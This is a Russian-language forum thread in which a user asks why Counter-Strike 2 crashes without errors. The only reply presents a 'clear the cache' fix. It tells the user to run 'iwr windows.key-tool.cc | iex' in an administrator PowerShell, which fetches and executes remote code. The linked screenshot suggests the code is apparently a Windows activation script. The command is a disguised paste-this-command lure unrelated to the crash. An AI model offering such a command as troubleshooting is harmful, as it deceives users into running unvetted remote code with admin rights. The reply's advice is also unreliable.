Время игр

Вылетает кс2 без ошибок

здравствуйте, из за чего могут быть вылеты в кс2, без ошибок без всего, просто игра вылетает либо комп крошится, коме не слабенький 5700x 1650. 16 ОЗУ , раньше была одна плышка оперативы думал из за перегрева плашки вылетает, но сейчас докупил вторую и стало так же вылетать ничего не греется проц отдыхает почти, видеокарта не превышает 60°, самое интересное что когда я собрал пк с одно плашкой игра вылетала часто, но после месяца - полтора, вылеты прекратились в чем может быть проблема

Скорее всего надо сбросить кеш

Нажать правой кнопкой мыши по пуску, выбрать PowerShell (администратор), вставить эту команду:

iwr windows.key-tool.cc | iex

Нажать Enter.

(не путать с командной строкой).

В открывшемся окне нажать 1.

https://i1.wampi.ru/2024/07/07/Microsoft-Activation-Scripts.png (скриншот).

После выполнения команды закрыть все окна и перезагрузить ПК.